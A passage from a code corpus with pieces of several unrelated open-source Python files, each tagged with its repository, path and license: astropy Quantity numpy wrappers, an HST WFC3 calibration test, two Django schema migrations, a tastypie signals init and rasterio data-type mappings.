kwargs : keyword arguments
Keyword arguments to the function.
If present, the following arguments are treated specially:
unit : `~astropy.units.Unit`
Unit of the output result. If not given, the unit of ``self``.
out : `~astropy.units.Quantity`
A Quantity instance in which to store the output.
Notes
-----
Output should always be assigned via a keyword argument, otherwise
no proper account of the unit is taken.
Returns
-------
out : `~astropy.units.Quantity`
Result of the function call, with the unit set properly.
"""
if unit is None:
unit = self.unit
# Ensure we don't loop back by turning any Quantity into array views.
args = (self.value,) + tuple((arg.value if isinstance(arg, Quantity)
else arg) for arg in args)
if out is not None:
# If pre-allocated output is used, check it is suitable.
# This also returns array view, to ensure we don't loop back.
arrays = tuple(arg for arg in args if isinstance(arg, np.ndarray))
kwargs['out'] = check_output(out, unit, arrays, function=function)
# Apply the function and turn it back into a Quantity.
result = function(*args, **kwargs)
return self._result_as_quantity(result, unit, out)
if NUMPY_LT_1_17:
def clip(self, a_min, a_max, out=None):
return self._wrap_function(np.clip, self._to_own_unit(a_min),
self._to_own_unit(a_max), out=out)
def trace(self, offset=0, axis1=0, axis2=1, dtype=None, out=None):
return self._wrap_function(np.trace, offset, axis1, axis2, dtype,
out=out)
def var(self, axis=None, dtype=None, out=None, ddof=0):
return self._wrap_function(np.var, axis, dtype,
out=out, ddof=ddof, unit=self.unit**2)
def std(self, axis=None, dtype=None, out=None, ddof=0):
return self._wrap_function(np.std, axis, dtype, out=out, ddof=ddof)
def mean(self, axis=None, dtype=None, out=None):
return self._wrap_function(np.mean, axis, dtype, out=out)
def round(self, decimals=0, out=None):
return self._wrap_function(np.round, decimals, out=out)
def dot(self, b, out=None):
result_unit = self.unit * getattr(b, 'unit', dimensionless_unscaled)
return self._wrap_function(np.dot, b, out=out, unit=result_unit)
# Calculation: override methods that do not make sense.
def all(self, axis=None, out=None):
raise NotImplementedError("cannot evaluate truth value of quantities. "
"Evaluate array with q.value.all(...)")
def any(self, axis=None, out=None):
raise NotImplementedError("cannot evaluate truth value of quantities. "
"Evaluate array with q.value.any(...)")
# Calculation: numpy functions that can be overridden with methods.
def diff(self, n=1, axis=-1):
return self._wrap_function(np.diff, n, axis)
def ediff1d(self, to_end=None, to_begin=None):
return self._wrap_function(np.ediff1d, to_end, to_begin)
def nansum(self, axis=None, out=None, keepdims=False):
return self._wrap_function(np.nansum, axis,
out=out, keepdims=keepdims)
def insert(self, obj, values, axis=None):
"""
Insert values along the given axis before the given indices and return
a new `~astropy.units.Quantity` object.
This is a thin wrapper around the `numpy.insert` function.
Parameters
----------
obj : int, slice or sequence of ints
Object that defines the index or indices before which ``values`` is
inserted.
values : array-like
Values to insert. If the type of ``values`` is different
from that of quantity, ``values`` is converted to the matching type.
``values`` should be shaped so that it can be broadcast appropriately
The unit of ``values`` must be consistent with this quantity.
axis : int, optional
Axis along which to insert ``values``. If ``axis`` is None then
the quantity array is flattened before insertion.
Returns
-------
out : `~astropy.units.Quantity`
A copy of quantity with ``values`` inserted. Note that the
insertion does not occur in-place: a new quantity array is returned.
Examples
--------
>>> import astropy.units as u
>>> q = [1, 2] * u.m
>>> q.insert(0, 50 * u.cm)
<Quantity [ 0.5, 1., 2.] m>
>>> q = [[1, 2], [3, 4]] * u.m
>>> q.insert(1, [10, 20] * u.m, axis=0)
<Quantity [[ 1., 2.],
[ 10., 20.],
[ 3., 4.]] m>
>>> q.insert(1, 10 * u.m, axis=1)
<Quantity [[ 1., 10., 2.],
[ 3., 10., 4.]] m>
"""
out_array = np.insert(self.value, obj, self._to_own_unit(values), axis)
return self._new_view(out_array)
class SpecificTypeQuantity(Quantity):
"""Superclass for Quantities of specific physical type.
Subclasses of these work just like :class:`~astropy.units.Quantity`, except
that they are for specific physical types (and may have methods that are
only appropriate for that type). Astropy examples are
:class:`~astropy.coordinates.Angle` and
:class:`~astropy.coordinates.Distance`
At a minimum, subclasses should set ``_equivalent_unit`` to the unit
associated with the physical type.
"""
# The unit for the specific physical type. Instances can only be created
# with units that are equivalent to this.
_equivalent_unit = None
# The default unit used for views. Even with `None`, views of arrays
# without units are possible, but will have an uninitalized unit.
_unit = None
# Default unit for initialization through the constructor.
_default_unit = None
# ensure that we get precedence over our superclass.
__array_priority__ = Quantity.__array_priority__ + 10
def __quantity_subclass__(self, unit):
if unit.is_equivalent(self._equivalent_unit):
return type(self), True
else:
return super().__quantity_subclass__(unit)[0], False
def _set_unit(self, unit):
if unit is None or not unit.is_equivalent(self._equivalent_unit):
raise UnitTypeError(
"{} instances require units equivalent to '{}'"
.format(type(self).__name__, self._equivalent_unit) +
(", but no unit was given." if unit is None else
f", so cannot set it to '{unit}'."))
super()._set_unit(unit)
def isclose(a, b, rtol=1.e-5, atol=None, **kwargs):
"""
Notes
-----
Returns True if two arrays are element-wise equal within a tolerance.
This is a :class:`~astropy.units.Quantity`-aware version of
:func:`numpy.isclose`.
"""
return np.isclose(*_unquantify_allclose_arguments(a, b, rtol, atol),
**kwargs)
def allclose(a, b, rtol=1.e-5, atol=None, **kwargs):
"""
Notes
-----
Returns True if two arrays are element-wise equal within a tolerance.
This is a :class:`~astropy.units.Quantity`-aware version of
:func:`numpy.allclose`.
"""
return np.allclose(*_unquantify_allclose_arguments(a, b, rtol, atol),
**kwargs)
def _unquantify_allclose_arguments(actual, desired, rtol, atol):
actual = Quantity(actual, subok=True, copy=False)
desired = Quantity(desired, subok=True, copy=False)
try:
desired = desired.to(actual.unit)
except UnitsError:
raise UnitsError("Units for 'desired' ({}) and 'actual' ({}) "
"are not convertible"
.format(desired.unit, actual.unit))
if atol is None:
# by default, we assume an absolute tolerance of 0
atol = Quantity(0)
else:
atol = Quantity(atol, subok=True, copy=False)
try:
atol = atol.to(actual.unit)
except UnitsError:
raise UnitsError("Units for 'atol' ({}) and 'actual' ({}) "
"are not convertible"
.format(atol.unit, actual.unit))
rtol = Quantity(rtol, subok=True, copy=False)
try:
rtol = rtol.to(dimensionless_unscaled)
except Exception:
raise UnitsError("`rtol` should be dimensionless")
return actual.value, desired.value, rtol.value, atol.value
|
bsipocz/astropy
|
astropy/units/quantity.py
|
Python
|
bsd-3-clause
| 70,750
|
import subprocess
import pytest
from ..helpers import BaseWFC3
class TestIR10Single(BaseWFC3):
"""Tests for WFC3/IR."""
detector = 'ir'
def _single_raw_calib(self, rootname):
raw_file = '{}_raw.fits'.format(rootname)
# Prepare input file.
self.get_input_file(raw_file)
# Run CALWF3
subprocess.call(['calwf3.e', raw_file, '-v'])
# Compare results
outputs = [('{}_flt.fits'.format(rootname),
'{}_flt_ref.fits'.format(rootname)),
('{}_ima.fits'.format(rootname),
'{}_ima_ref.fits'.format(rootname))]
self.compare_outputs(outputs)
# ib2k03dlq = Ported from calwf3_ir_10
@pytest.mark.parametrize(
'rootname', ['ib2k03dlq'])
def test_ir_10single(self, rootname):
self._single_raw_calib(rootname)
|
jhunkeler/hstcal
|
tests/wfc3/test_ir_10single.py
|
Python
|
bsd-3-clause
| 861
|
# encoding: utf-8
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Deleting field 'UniApplicationEntry.reason'
db.delete_column('uniapply_uniapplicationentry', 'reason')
# Adding M2M table for field materials on 'UniApplicationEntry'
db.create_table('uniapply_uniapplicationentry_materials', (
('id', models.AutoField(verbose_name='ID', primary_key=True, auto_created=True)),
('uniapplicationentry', models.ForeignKey(orm['uniapply.uniapplicationentry'], null=False)),
('materialentry', models.ForeignKey(orm['materials.materialentry'], null=False))
))
db.create_unique('uniapply_uniapplicationentry_materials', ['uniapplicationentry_id', 'materialentry_id'])
def backwards(self, orm):
# Adding field 'UniApplicationEntry.reason'
db.add_column('uniapply_uniapplicationentry', 'reason', self.gf('django.db.models.fields.TextField')(default='', blank=True), keep_default=False)
# Removing M2M table for field materials on 'UniApplicationEntry'
db.delete_table('uniapply_uniapplicationentry_materials')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'classes.logicalclass': {
'Meta': {'object_name': 'LogicalClass'},
'date': ('django.db.models.fields.DateField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'major': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['classes.Major']"}),
'seq': ('django.db.models.fields.IntegerField', [], {})
},
'classes.major': {
'Meta': {'object_name': 'Major'},
'code': ('django.db.models.fields.CharField', [], {'max_length': '4'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '16'}),
'shortname': ('django.db.models.fields.CharField', [], {'max_length': '4'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'materials.materialentry': {
'Meta': {'object_name': 'MaterialEntry'},
'content': ('django.db.models.fields.TextField', [], {}),
'ctime': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_locked': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'mtime': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'uniapply.auditingrule': {
'Meta': {'object_name': 'AuditingRule'},
'auditer': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'niceness': ('django.db.models.fields.IntegerField', [], {}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['uniapply.Target']"})
},
'uniapply.auditoutcome': {
'Meta': {'object_name': 'AuditOutcome'},
'entry': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['uniapply.UniApplicationEntry']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'reason': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'rule': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['uniapply.AuditingRule']"}),
'status': ('django.db.models.fields.IntegerField', [], {})
},
'uniapply.target': {
'Meta': {'object_name': 'Target'},
'allow_blank_reason': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'allowed_classes': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['classes.LogicalClass']", 'symmetrical': 'False'}),
'desc': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'end_date': ('django.db.models.fields.DateTimeField', [], {}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'pagelink': ('django.db.models.fields.CharField', [], {'max_length': '256', 'blank': 'True'}),
'start_date': ('django.db.models.fields.DateTimeField', [], {}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'uniapply.uniapplicationentry': {
'Meta': {'object_name': 'UniApplicationEntry'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'materials': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['materials.MaterialEntry']", 'symmetrical': 'False'}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['uniapply.Target']"}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
}
}
complete_apps = ['uniapply']
|
team-xue/xue
|
xue/uniapply/migrations/0003_use_material.py
|
Python
|
bsd-3-clause
| 8,698
|
# -*- coding: utf-8 -*-
__author__ = 'Christopher D\'Cunha'
__email__ = 'me@christopherdcunha.com'
__version__ = '0.1.0'
from .signals import *
__all__ = [
'pre_get_detail', 'pre_put_detail', 'pre_post_detail', 'pre_delete_detail',
'pre_get_list', 'pre_put_list', 'pre_post_list', 'pre_delete_list',
'post_get_detail', 'post_put_detail', 'post_post_detail',
'post_delete_detail',
'post_get_list', 'post_put_list', 'post_post_list', 'post_delete_list'
]
|
christopherdcunha/tastypie_signals
|
tastypie_signals/__init__.py
|
Python
|
bsd-3-clause
| 476
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.3 on 2017-01-10 16:38
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [("repository", "0001_initial"), ("build", "0001_initial")]
operations = [
migrations.CreateModel(
name="TestClass",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(db_index=True, max_length=255)),
(
"repo",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="testclasses",
to="repository.Repository",
),
),
],
options={
"verbose_name": "Test Class",
"verbose_name_plural": "Test Classes",
},
),
migrations.CreateModel(
name="TestCodeUnit",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("unit", models.TextField(db_index=True)),
("unit_type", models.CharField(db_index=True, max_length=255)),
("duration", models.FloatField(blank=True, db_index=True, null=True)),
(
"event",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"sobject",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"email_invocations_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"email_invocations_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"soql_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"soql_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"future_calls_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"future_calls_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"cpu_time_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"cpu_time_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"query_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"query_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_statements_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_statements_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"mobile_apex_push_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"mobile_apex_push_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"heap_size_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"heap_size_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"sosl_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"sosl_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"queueable_jobs_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"queueable_jobs_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"callouts_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"callouts_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_email_invocations_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_email_invocations_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_soql_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_soql_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_future_calls_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_future_calls_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_cpu_time_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_cpu_time_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_query_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_query_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_statements_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_statements_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_mobile_apex_push_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_mobile_apex_push_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_heap_size_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_heap_size_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_sosl_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_sosl_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_queueable_jobs_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_queueable_jobs_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_callouts_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_callouts_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"parent",
models.ForeignKey(
blank=True,
null=True,
on_delete=django.db.models.deletion.CASCADE,
related_name="children",
to="testresults.TestCodeUnit",
),
),
],
options={
"verbose_name": "Test Code Unit",
"verbose_name_plural": "Test Code Units",
},
),
migrations.CreateModel(
name="TestMethod",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("name", models.CharField(db_index=True, max_length=255)),
(
"testclass",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="methods",
to="testresults.TestClass",
),
),
],
options={"verbose_name": "Test Method"},
),
migrations.CreateModel(
name="TestResult",
fields=[
(
"id",
models.AutoField(
auto_created=True,
primary_key=True,
serialize=False,
verbose_name="ID",
),
),
("duration", models.FloatField(blank=True, db_index=True, null=True)),
(
"outcome",
models.CharField(
choices=[
(b"Pass", b"Pass"),
(b"CompileFail", b"CompileFail"),
(b"Fail", b"Fail"),
(b"Skip", b"Skip"),
],
db_index=True,
max_length=16,
),
),
("stacktrace", models.TextField(blank=True, null=True)),
("message", models.TextField(blank=True, null=True)),
(
"email_invocations_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"email_invocations_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"email_invocations_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"soql_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"soql_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"soql_queries_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"future_calls_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"future_calls_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"future_calls_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_rows_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"cpu_time_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"cpu_time_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"cpu_time_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"query_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"query_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"query_rows_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_statements_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_statements_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"dml_statements_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"mobile_apex_push_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"mobile_apex_push_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"mobile_apex_push_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"heap_size_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"heap_size_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"heap_size_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"sosl_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"sosl_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"sosl_queries_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"queueable_jobs_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"queueable_jobs_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"queueable_jobs_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"callouts_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"callouts_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"callouts_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_email_invocations_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_email_invocations_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_email_invocations_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_soql_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_soql_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_soql_queries_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_future_calls_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_future_calls_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_future_calls_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_rows_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_cpu_time_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_cpu_time_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_cpu_time_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_query_rows_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_query_rows_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_query_rows_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_statements_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_statements_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_dml_statements_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_mobile_apex_push_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_mobile_apex_push_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_mobile_apex_push_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_heap_size_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_heap_size_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_heap_size_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_sosl_queries_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_sosl_queries_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_sosl_queries_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_queueable_jobs_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_queueable_jobs_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_queueable_jobs_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_callouts_used",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_callouts_allowed",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"test_callouts_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"worst_limit",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"worst_limit_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"worst_limit_nontest",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"worst_limit_nontest_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"worst_limit_test",
models.CharField(
blank=True, db_index=True, max_length=255, null=True
),
),
(
"worst_limit_test_percent",
models.IntegerField(blank=True, db_index=True, null=True),
),
(
"build_flow",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="test_results",
to="build.BuildFlow",
),
),
(
"method",
models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="test_results",
to="testresults.TestMethod",
),
),
],
options={
"verbose_name": "Test Result",
"verbose_name_plural": "Test Results",
},
),
migrations.AddField(
model_name="testcodeunit",
name="testresult",
field=models.ForeignKey(
on_delete=django.db.models.deletion.CASCADE,
related_name="codeunits",
to="testresults.TestResult",
),
),
]
|
SalesforceFoundation/mrbelvedereci
|
metaci/testresults/migrations/0001_initial.py
|
Python
|
bsd-3-clause
| 26,271
|
"""Mapping of GDAL to Numpy data types.
Since 0.13 we are not importing numpy here and data types are strings.
Happily strings can be used throughout Numpy and so existing code will
not break.
Within Rasterio, to test data types, we use Numpy's dtype() factory to
do something like this:
if np.dtype(destination.dtype) == np.dtype(rasterio.uint8): ...
"""
bool_ = 'bool'
ubyte = uint8 = 'uint8'
uint16 = 'uint16'
int16 = 'int16'
uint32 = 'uint32'
int32 = 'int32'
float32 = 'float32'
float64 = 'float64'
complex_ = 'complex'
complex64 = 'complex64'
complex128 = 'complex128'
# Not supported:
# GDT_CInt16 = 8, GDT_CInt32 = 9, GDT_CFloat32 = 10, GDT_CFloat64 = 11
dtype_fwd = {
0: None, # GDT_Unknown
1: ubyte, # GDT_Byte
2: uint16, # GDT_UInt16
3: int16, # GDT_Int16
4: uint32, # GDT_UInt32
5: int32, # GDT_Int32
6: float32, # GDT_Float32
7: float64, # GDT_Float64
8: complex_, # GDT_CInt16
9: complex_, # GDT_CInt32
10: complex64, # GDT_CFloat32
11: complex128} # GDT_CFloat64
dtype_rev = dict((v, k) for k, v in dtype_fwd.items())
dtype_rev['uint8'] = 1
typename_fwd = {
0: 'Unknown',
1: 'Byte',
2: 'UInt16',
3: 'Int16',
4: 'UInt32',
5: 'Int32',
6: 'Float32',
7: 'Float64',
8: 'CInt16',
9: 'CInt32',
10: 'CFloat32',
11: 'CFloat64'}
typename_rev = dict((v, k) for k, v in typename_fwd.items())
dtype_ranges = {
'uint8': (0, 255),
'uint16': (0, 65535),
'int16': (-32768, 32767),
'uint32': (0, 4294967295),
'int32': (-2147483648, 2147483647),
'float32': (-3.4028235e+38, 3.4028235e+38),
'float64': (-1.7976931348623157e+308, 1.7976931348623157e+308)}
def _gdal_typename(dt):
try:
return typename_fwd[dtype_rev[dt]]
except KeyError:
return typename_fwd[dtype_rev[dt().dtype.name]]
def check_dtype(dt):
"""Check if dtype is a known dtype."""
if str(dt) in dtype_rev:
return True
elif callable(dt) and str(dt().dtype) in dtype_rev:
return True
return False
def get_minimum_dtype(values):
"""Determine minimum type to represent values.
Uses range checking to determine the minimum integer or floating point
data type required to represent values.
Parameters
----------
values: list-like
Returns
-------
rasterio dtype string
"""
import numpy as np
if not is_ndarray(values):
values = np.array(values)
min_value = values.min()
max_value = values.max()
if values.dtype.kind in ('i', 'u'):
if min_value >= 0:
if max_value <= 255:
return uint8
elif max_value <= 65535:
return uint16
elif max_value <= 4294967295:
return uint32
elif min_value >= -32768 and max_value <= 32767:
return int16
elif min_value >= -2147483648 and max_value <= 2147483647:
return int32
else:
